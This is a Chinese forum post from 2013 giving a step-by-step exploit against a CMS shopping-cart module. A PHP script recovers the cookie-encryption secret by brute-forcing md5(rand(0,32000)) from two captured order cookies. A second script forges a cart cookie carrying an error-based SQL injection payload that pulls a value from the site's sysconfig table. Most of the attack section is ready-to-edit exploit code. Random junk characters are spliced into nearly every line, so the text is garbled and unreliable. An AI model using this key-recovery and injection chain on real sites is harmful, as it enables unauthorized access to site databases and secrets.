www.xxx.com/plus/search.php?keyword=& ?/ g/ V* o8 H8 U
在 include/shopcar.class.php中4 S% z4 A1 C( E$ c ?' h) c9 L1 J
先看一下这个shopcar类是如何生成cookie的
; Q5 @& e: S; B, m! V6 c7 q239 function saveCookie($key,$value)
- d6 o. ~" W* ?: p240 {
+ o, e+ e% | w241 if(is_array($value))) N) c+ \0 g/ T- c/ E8 I
242 {. b# c. m: f" Q4 R9 O$ h5 p
243 $value = $this->enCrypt($this->enCode($value));4 C) V3 ^ N l% j0 ~0 E8 U
244 }7 b3 n+ B- B/ s5 _" |8 u
245 else
% s% I; y# K+ z! _$ f246 {5 C8 E% K& L8 f) P T
247 $value = $this->enCrypt($value);
2 _, z9 X% q% }" p" M* B! @9 z248 }! i8 M6 R* c/ \0 ~
249 setcookie($key,$value,time()+36000,’/');8 K3 j1 e; Y2 o. c! k3 N
250 }
1 H- r' e& S! P+ m! N+ _/ I简单的说,$key就是cookie的key,value就是value,enCode的作用是将array类型转变为a=yy&b=cc&d=know这样的类型,关键是enCrypt函数% ?% [2 n# {% x( @
186 function enCrypt($txt)
- |" f0 O- q9 i* c: K187 {8 N7 ]; E5 j# q1 S0 S: x G. I3 G
188 srand((double)microtime() * 1000000);
E1 n$ ]: _ d. _3 m189 $encrypt_key = md5(rand(0, 32000));
6 |/ _% s; q) {- F190 $ctr = 0;: d4 Y k7 U- {% S
191 $tmp = ”;
' S6 S1 l; ^0 l6 Y; X4 t% |192 for($i = 0; $i < strlen($txt); $i++)2 K7 B# f; P: s" l8 ~9 _( D1 O
193 {* t$ E/ L& b. _- z y7 f) e
194 $ctr = $ctr == strlen($encrypt_key) ? 0 : $ctr;. D6 C9 m" D1 w2 W8 j" t( [, c
195 $tmp .= $encrypt_key[$ctr].($txt[$i] ^ $encrypt_key[$ctr++]);
: J {+ A4 h) ~# B3 o196 } w. M! z& X {' _0 Q
197 return base64_encode($this->setKey($tmp));5 z9 r" U& _! @, [
198 }
8 Y% j i" W. l/ _213 function setKey($txt)
/ x6 Q4 f5 O% k+ {214 {9 S) |5 G& A/ w; y4 \
215 global $cfg_cookie_encode;
' h" @4 m# L# V/ M4 h8 }+ y- A1 o216 $encrypt_key = md5(strtolower($cfg_cookie_encode)); u2 b+ H2 L5 o) a3 G- i
217 $ctr = 0;
$ G1 t6 L* u. f. H& }4 M( p218 $tmp = ”;* ~& ~% @5 W1 ]* |% `/ R
219 for($i = 0; $i < strlen($txt); $i++). @8 U( g- \. S; w
220 {: u T: E# J4 t8 ^; Y8 k& R
221 $ctr = $ctr == strlen($encrypt_key) ? 0 : $ctr;8 f v9 Q- M: X8 l) c
222 $tmp .= $txt[$i] ^ $encrypt_key[$ctr++];7 d7 G: f) \& h% c
223 }0 d; W" c4 F9 Y4 c0 [, ^5 ?
224 return $tmp;
1 M; d6 a2 ~, q" \8 f6 s225 }: ~: G% h; y4 p- u! D" T6 o" Y. D
enCrypt的参数$txt 我们是可知的,返回值就是cookie的值,这个我们也是可知的
3 A7 y- J! P+ ?' t3 B c- X然后到了enCrypt调用 setKey时的参数$tmp,这个参数在某种意义上,我们也是可知的,因为$encrypt_key = md5(rand(0, 32000));只有32000种可能,我们可以推出32000种可能的$tmp,从而推出32000种可能的md5(strtolower($cfg_cookie_encode)),对了,忘记说了,我们的目的是推测出setKey中$encrypt_key的值,然后才能任意构造出购物车的cookie,从推出的32000种md5(strtolower($cfg_cookie_encode)),简单过滤掉非字母数字的key,就只剩下几百个可能的key,然后我们再从新下一次订单,然后再获取几百个可能的key,然后取交集,得到最终key。5 B P( s) I( q+ ?( ~9 t
具体代码如下:
" Y% `: x! v9 x8 J M8 l; l A0 z<?php1 i& u$ P( {2 H6 m$ M
$cookie1 = “X2lRPFNlCmlWc1cvAHNXMABjAToHbVcyB3ZXJFIwA20LIAlzU2ULPARyAmQGIVU5VyJbfFVsBiYNN1dsUG0DIl90UTFTLAo3VjBXYgBvVzgAZAEqBz9XagclVzBSbw==”; // here is the first cookie,change here
9 ^' u3 Q' H# |5 o& g' E1 z3 d$cookie2 = “ADYCb1RiBmUDJghwUyAFYlIxW2BROwhtVCUIe1AyC2UOJVMpADYBNgJ0AmRUcw5iAncAJ1JrCSlQalBrAj8CIwArAmJUKwY7A2UIPVM8BWpSNltwUWkINVR2CG9QbQ==”; // here is the second cookie ,change here
0 y3 @- H2 B; J: O$ Z$plantxt = “id=2&price=0&units=fun&buynum=1&title=naduohua1″; // here is the text , change here
% N' N# K& |9 M- Kfunction reStrCode($code,$string)
. x: K6 R- U# r1 c4 i ^3 ^$ |4 a{
7 M. H7 \% P( b% m d; @$code = base64_decode($code);
+ K" J S: s( _$key = “”;
! X1 P+ L5 d* B. W" i( G7 \for($i=0 ; $i<32 ; $i++)* v$ Y2 C9 D1 y E
{
4 I5 x* L4 C# L, l$key .= $string[$i] ^ $code[$i];# ~/ b4 x. R( ]& {' k* y* \! K
}
. A$ i2 w/ @* T( nreturn $key;
, B% Z4 U/ h4 R7 ?% W}
1 S8 O' X1 G' k) j; ifunction getKeys($cookie,$plantxt)3 f/ k* y" X* h1 }1 S! `6 j# J) e
{
/ u4 T- N* |1 y! C. s# m9 ?$tmp = $cookie;" _$ d/ o7 |# `# c$ N1 N! o
$results = array();
! F8 F4 C' f, R# [; ]4 ]5 E1 _for($j=0 ; $j < 32000; $j++)
6 d: B; G6 ]+ M! E9 T a{9 X* }1 O* |* ]2 {0 Z
! C; ^6 r* C+ _6 F: {
$txt = $plantxt;
$ Q* R% W/ i9 J2 f0 ?: E: E$ctr = 0;
' D) m2 v. k* a2 ~, P$tmp = ”;
+ t/ x- t4 [& r7 y) ~9 ~1 M7 [$encrypt_key = md5($j);6 }- h+ J3 a* f E
for($i =0; $i < strlen($txt); $i ++)
' V ?9 q, p# J" t2 e2 ~3 Z6 f{
) y) z" K7 p9 \7 F$ `$ctr = $ctr == strlen($encrypt_key) ? 0 : $ctr;9 W5 c1 j2 u$ {
$tmp .= $encrypt_key[$ctr].($txt[$i] ^ $encrypt_key[$ctr++]);
4 K$ I' H" n* Y) D& I! c0 ~4 s7 h}
% A4 q+ x& h+ i& }$string = $tmp;
! o5 k3 W+ k( E7 j1 [6 i6 Y$code = $cookie;
' v, y$ W1 o# o( K: L3 v$result = reStrCode($code,$string);
t0 k/ W8 P1 n/ A% cif(eregi(‘^[a-z0-9]+$’,$result)) R* T5 |- |) R k
{
" z7 O; h2 Q5 M; @4 J+ u* A6 Mecho $result.”\n”;
* C& L4 k0 M" W- d$ T: o( n$results[] = $result;
9 P9 [2 ]. I) C3 Y5 ^# I}
4 q& W* g) b7 R8 g}# W2 i Q3 W% R* o
return $results;
) _9 v7 V$ A' k# R$ ]( N/ G5 s- t}
; b3 o& C- b/ b, x$results1 = getKeys($cookie1,$plantxt);
" E/ z3 T$ M `+ ]' Z$results2 = getKeys($cookie2,$plantxt);
0 ~ c& k4 r% P% _* q( Nprint “\n——————–real key————————–\n”;
, W' U! Z9 W1 X, F. D- y# rforeach($results1 as $test1)
$ j+ y5 H. O9 v+ M( g) H{/ q( y8 R: V( _$ W+ X
foreach($results2 as $test2)
/ ^; s( r) E; Q* ?{9 ` d; b6 k9 O$ F) N8 M6 B
if($test1 == $test2)
( ~9 o/ D' s9 T' u4 e{: f q9 j: i3 x% f
echo $test1.”\n”;0 T6 Z5 t( P5 ~3 P7 ^
}& Q+ |: F0 n6 M0 _) C" l
}; Y" S5 e ]( C D+ V4 z! B
}
% D, d: D. i0 a$ |?>
1 h0 H, A& x' ` o8 p$ `. G) c Scookie1 和 cookie2 是我下了两次订单后分别生成的cookie,
|3 R* t7 o' k4 C& Mplantxt可以根据页面来自己推算,大概就是这个格式:id=2&price=0&units=fun&buynum=1&title=naduohua1' g) c6 A2 |& x$ }3 \
然后推算出md5(strtolower($cfg_cookie_encode))1 @& S, @4 D0 b/ a
得到这个key之后,我们就可以构造任意购物车的cookie& u$ ]2 k# \2 U- H# {" G) l" E
接着看 Y; O S5 V; \
20 class MemberShops
0 g, V/ E: i; G7 l A9 W8 M, ~ |! c21 {
, e, e l6 F \* [22 var $OrdersId;0 }: U1 ^+ F$ K% W4 R7 Y a
23 var $productsId;
- D. j. ^4 r6 n V2 H( F# j241 Q* p2 G3 M5 Z5 k
25 function __construct()* T6 a3 H3 y# n; J1 e7 U7 D2 H, ]
26 {0 }: c4 L; v' a6 V* f0 `% Q
27 $this->OrdersId = $this->getCookie(“OrdersId”);
! k7 }8 i+ i2 O! z" C28 if(empty($this->OrdersId))
0 Y5 D3 k1 L: W6 Z, p! D* Z29 {9 C8 a1 c6 z; O6 W
30 $this->OrdersId = $this->MakeOrders();) K- N- A) x. F) s2 j5 H5 S
31 }
( G. W7 a( o% i, ]; A1 B9 e2 z- A, M32 } ^3 `* x a- _- H2 L$ @$ X$ I# w6 p
发现OrderId是从cookie里面获取的# p6 G& G+ ?3 u4 I
然后
. V! t& @; f' ~/ F/plus/carbuyaction.php中的
/ c9 d4 M- u% H2 S" G29 $cart = new MemberShops();
" ^8 _2 h: \ R8 H6 n& |39 $OrdersId = $cart->OrdersId; //本次记录的订单号, o, z2 X$ L5 v% g( c0 C; G* O$ O- p
……
3 ]6 Z" q: s3 j" S173 $rows = $dsql->GetOne(“SELECT `oid` FROM #@__shops_orders WHERE oid=’$OrdersId’ LIMIT 0,1″);
% T7 a/ S5 o R0 G& A接着我们就可以注入了8 L! E, `2 U/ ~4 v$ F) P) D% \8 p1 b
通过利用下面代码生成cookie:
: E/ @7 S2 r, q/ K3 d<?php) u" w2 q( A( A& ?
$txt = “1′ or 1=@`\’` and (SELECT 1 FROM (select count(*),concat(floor(rand(0)*2),(substring((select value from #@__sysconfig where aid=3),1,62)))a from information_schema.tables group by a)b) or 1=@`\’` or ’1′=’1″;
( Q9 k6 C/ Z+ [$encrypt_key = “9f09293b7419ed68448fb51d5b174834″; // here is the key, please change here
3 x, s3 h% y" q" N, @" N/ Pfunction setKey($txt). l1 a; e* T, C* K
{
+ b# {* c+ q0 yglobal $encrypt_key;
" g; O- W8 ]8 f! i2 \2 f$ctr = 0;
8 `0 M$ l- S$ _$tmp = ”;7 N1 v: a# U7 X/ M: k- {* r! W" T1 X
for($i = 0; $i < strlen($txt); $i++)
0 G& \9 Q% I4 ]8 l# N, N0 y {{
" G" h7 V% ]- b/ z0 k. ]3 x# l$ctr = $ctr == strlen($encrypt_key) ? 0 : $ctr;
) X% E) ?2 z2 L1 x: P$tmp .= $txt[$i] ^ $encrypt_key[$ctr++];5 i* b3 J5 f! H4 ` I$ {/ Q
}
6 F. S$ ]8 N: ureturn $tmp;
7 A% |% ]! L# `' s- _& p( a, D6 j' u}
, E! g* r9 I s x' A% tfunction enCrypt($txt)
( S( L. d: Z4 \9 F f{
. J! e: V L6 w* Lsrand((double)microtime() * 1000000);
0 e3 j2 G, `2 D3 f$encrypt_key = md5(rand(0, 32000));8 A3 C) }( x+ ~* L+ x6 g8 I
$ctr = 0;2 X6 j6 \2 b4 Y0 v8 E. Y+ p1 R8 X
$tmp = ”;
- t- s- D D9 a; ]for($i = 0; $i < strlen($txt); $i++)
; U' y! h6 k3 N ?{$ k7 {7 @ E# a; N7 w8 ~
$ctr = $ctr == strlen($encrypt_key) ? 0 : $ctr;* \. J( V& Q6 {3 H, Z4 l
$tmp .= $encrypt_key[$ctr].($txt[$i] ^ $encrypt_key[$ctr++]);2 s7 w9 m0 w7 d. M, G9 g
}
4 ?; N8 c5 p- p) `5 a* Zreturn base64_encode(setKey($tmp));
2 O5 r" m" I3 M$ `}3 y& |! B/ s, X$ X9 s4 J
for($dest =0;$dest = enCrypt($txt);)
( R( O, P# s8 H2 B# }. D* B{
1 Q" J! E3 a' {/ `if(!strpos($dest,’+'))
+ E% e( I5 u' `$ M4 n( }: x- r{7 w. [9 q; q! D
break;
& x9 W' o) X# P" ^8 B8 u6 ~3 c2 d/ |}/ C$ @2 q) N0 y, d& B
}
& i; n0 y& ~ w( S9 w' J7 mecho $dest.”\n”;
! a% c% R, M/ b; R# T/ }?>
2 Z9 `. L: I) B( ]0 m
1 e0 l& _; s+ n: d Z9 @( X* N( n8 Y |
发表于 2013-2-13 23:58:29
收藏
支持
反对